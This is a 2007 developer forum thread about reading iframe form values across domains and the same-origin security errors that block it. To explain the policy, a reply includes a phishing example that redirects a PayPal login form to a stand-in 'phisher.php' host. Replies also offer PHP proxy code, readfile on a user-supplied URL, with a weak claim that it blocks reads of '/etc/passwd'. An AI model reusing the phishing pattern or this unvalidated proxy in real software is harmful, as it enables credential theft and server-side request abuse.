473,320 Members | 1,722 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

Join Bytes to post your question to a community of 473,320 software developers and data experts.

Re-write document.location

Hi,

I'm developing an app on one domain and want to read certain variables in to another domain.

is it possible using an iframe?

i keep getting security errors and i've tracked it down to the "document.location."
in the js.

does anyone know if it's possible to re-write or side-step this?

thanks
May 27 '07 #1
8 1591
pbmods
5,821 Expert 4TB
Heya, designassassin. Welcome to TSDN!

I'm developing an app on one domain and want to read certain variables in to another domain.
I'm not sure I understand what you're trying to accomplish.

Are you trying to define JavaScript variables in an iframe that you want to be accessible to the parent page?

Or do you need to access server-side variables from the client side?
May 28 '07 #2
Thanks,

I have an online app that for various reasons i had to build on a windows server. anyway, when this page is run in a browser it generates some variables that populate a form. stuff like 'page load time' etc...

on a second domain i have another, more basic app (on a unix server) that runs some php commands to compile the data. i was hoping tthat, through an iframe i could load app 1 variables into app 2's page. but it doesn't work! :(

I'm sure my code is sound - it's just as soon as i try to read the vars across domains it packs-up... i get a security error.

is v frustrating because I'm at the final hurdle with this one.
May 28 '07 #3
pbmods
5,821 Expert 4TB
when this page is run in a browser it generates some variables that populate a form. stuff like 'page load time' etc...

on a second domain i have another, more basic app (on a unix server) that runs some php commands to compile the data. i was hoping tthat, through an iframe i could load app 1 variables into app 2's page. but it doesn't work!
So you're trying to pass variables from page 1 to page 2... via what? AJAX? Using a form? Loading a new URL with GET variables?

I'm sure my code is sound - it's just as soon as i try to read the vars across domains it packs-up... i get a security error.
You will get a security error on most browsers if you try to fetch a page from a different domain using AJAX. This is to prevent XSS.

The solution is to create a page on your server that uses file_get_contents to load the page from the other domain and then call that script with your AJAX call instead.
May 28 '07 #4
Thanks for your input.

I'm just using a bit of javascript:

[HTML]onClick="document.myform2.mysession.value=window.f rames['ifrm'].document.forms['frm_product'].elements['sessiontime'].value">[/HTML]

Alternatively, As the final information is for my eyes only - i wondered if there was an old version of a browser that you could recommend that wouldn't give me security errors. This is not ideal but i think i could get by like this.
May 28 '07 #5
pbmods
5,821 Expert 4TB
[HTML]onClick="document.myform2.mysession.value=window.f rames['ifrm'].document.forms['frm_product'].elements['sessiontime'].value">[/HTML]
I think I understand why you are getting security errors with this statement.

Suppose you created a website that looked something like this:

Expand|Select|Wrap|Line Numbers
  1. <html>
  2. <iframe id="thePfhrame" src="http://www.paypal.com/login"></iframe>
  3. <script type="text/javascript">
  4. document.getElementById('thePfhrame').document.forms[0].action = 'http://mysneakysite.com/phisher.php';
  5. </script>
  6. </html>
  7.  
Assuming that the first form on paypal.com/login is the login form, you can see how somebody might set up a pretty convincing phishing page. Even if you right-click on the [frame] and select "show source", you'll see the source for the original PayPal login page.

In order to be able to modify the contents of your iframe, you'd have to set it up so that it loads a page from the same domain as its parent.

My recommendation would be to load the target page on the server side and output it, like this:

Expand|Select|Wrap|Line Numbers
  1. <iframe src="http://mysite.com/redirect.php?url=www.somesite.com%2Fpath%2Fto%2Fthe%2Fpage.ext"></iframe>
redirect.php:
Expand|Select|Wrap|Line Numbers
  1. readfile($_GET['url']);
  2.  
[EDIT: Of course, you could then abuse this in the example above by changing the form's source to http: //mysite.com/redirect.php?url=www.paypal.com%2Flogin. But smart Users will check their location bar anyway.]
May 28 '07 #6
mmm.. interesting.

am i right in thinking that i'd need to uplooad a php file on the target server (i.e. the one in the iframe)?

if so, i'd like to try and avoid doing this if possible.

here're the 2 domains i'm working with...

my admin page (domain 1)
http://formworks.org/gb_mod

my app page (domain 2)
http://www.takeawayplace.com/gb/index2.html

...the thinking is you type some text into the box and click 'receive data' - this is basically what i want to be able to do.

my example uses a flash form - but it can easily be an html form.

please let me know if you can think of a way to do it so i don't have to upload another file to domain 2.

thanks again.
May 29 '07 #7
I'm still stuck on this one. :(

I'm thinking that there's a way to get a variable using php POST or GET

am i on the right track?

tnx
May 29 '07 #8
pbmods
5,821 Expert 4TB
my admin page (domain 1)
http://formworks.org/gb_mod

my app page (domain 2)
http://www.takeawayplace.com/gb/index2.html
Try something like this:
Expand|Select|Wrap|Line Numbers
  1. function doSomething() {
  2.     document.getElementById('theEyePfhrame').src = 'http://formworks.org/loadExternal.php?url=' + encodeURIComponent('takeawayplace.com/gb/index2.html');
  3. }
  4.  
Note that we leave off the 'http://www' from the target URL. This is important.

Then create loadExternal.php:
Expand|Select|Wrap|Line Numbers
  1. readfile("http://www.$_GET[url]");
  2.  
We put the 'http://www.' here so that a User couldn't modify the JavaScript and try to fetch '/etc/passwd' for example, or '/var/www/mysqlpassword.php', or.... Instead, we force the script to attempt to load a website.

Anyway, so there you have a script that accesses a page on the same domain, which loads the page from the other domain and directly echoes the output.

Once that page loads, since the domain is the same as the parent page, you should be able to access JavaScript variables from that page.
May 29 '07 #9

Sign in to post your reply or Sign up for a free account.

Similar topics

1
by: Nel | last post by:
I have a question related to the "security" issues posed by Globals ON. It is good programming technique IMO to initialise variables, even if it's just $foo = 0; $bar = ""; Surely it would...
4
by: Craig Bailey | last post by:
Anyone recommend a good script editor for Mac OS X? Just finished a 4-day PHP class in front of a Windows machine, and liked the editor we used. Don't recall the name, but it gave line numbers as...
1
by: Chris | last post by:
Sorry to post so much code all at once but I'm banging my head against the wall trying to get this to work! Does anyone have any idea where I'm going wrong? Thanks in advance and sorry again...
11
by: James | last post by:
My form and results are on one page. If I use : if ($Company) { $query = "Select Company, Contact From tblworking Where ID = $Company Order By Company ASC"; }
4
by: Alan Walkington | last post by:
Folks: How can I get an /exec'ed/ process to run in the background on an XP box? I have a monitor-like process which I am starting as 'exec("something.exe");' and, of course the exec function...
1
by: John Ryan | last post by:
What PHP code would I use to check if submitted sites to my directory actually exist?? I want to use something that can return the server code to me, ie HTTP 300 OK, or whatever. Can I do this with...
10
by: James | last post by:
What is the best method for creating a Web Page that uses both PHP and HTML ? <HTML> BLA BLA BLA BLA BLA
8
by: Beowulf | last post by:
Hi Guru's, I have a query regarding using PHP to maintain a user profiles list. I want to be able to have a form where users can fill in their profile info (Name, hobbies etc) and attach an...
1
by: joost | last post by:
Hello, I'm kind of new to mySQL but more used to Sybase/PHP What is illegal about this query or can i not use combined query's in mySQL? DELETE FROM manufacturers WHERE manufacturers_id ...
2
by: sky2070 | last post by:
i have two file with jobapp.html calling jobapp_action.php <HTML> <!-- jobapp.html --> <BODY> <H1>Phop's Bicycles Job Application</H1> <P>Are you looking for an exciting career in the world of...
0
by: DolphinDB | last post by:
Tired of spending countless mintues downsampling your data? Look no further! In this article, you’ll learn how to efficiently downsample 6.48 billion high-frequency records to 61 million...
0
by: ryjfgjl | last post by:
ExcelToDatabase: batch import excel into database automatically...
0
isladogs
by: isladogs | last post by:
The next Access Europe meeting will be on Wednesday 6 Mar 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:15 (7.15PM). In this month's session, we are pleased to welcome back...
0
by: jfyes | last post by:
As a hardware engineer, after seeing that CEIWEI recently released a new tool for Modbus RTU Over TCP/UDP filtering and monitoring, I actively went to its official website to take a look. It turned...
0
by: ArrayDB | last post by:
The error message I've encountered is; ERROR:root:Error generating model response: exception: access violation writing 0x0000000000005140, which seems to be indicative of an access violation...
1
by: PapaRatzi | last post by:
Hello, I am teaching myself MS Access forms design and Visual Basic. I've created a table to capture a list of Top 30 singles and forms to capture new entries. The final step is a form (unbound)...
1
by: CloudSolutions | last post by:
Introduction: For many beginners and individual users, requiring a credit card and email registration may pose a barrier when starting to use cloud servers. However, some cloud server providers now...
0
by: af34tf | last post by:
Hi Guys, I have a domain whose name is BytesLimited.com, and I want to sell it. Does anyone know about platforms that allow me to list my domain in auction for free. Thank you
0
by: Faith0G | last post by:
I am starting a new it consulting business and it's been a while since I setup a new website. Is wordpress still the best web based software for hosting a 5 page website? The webpages will be...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.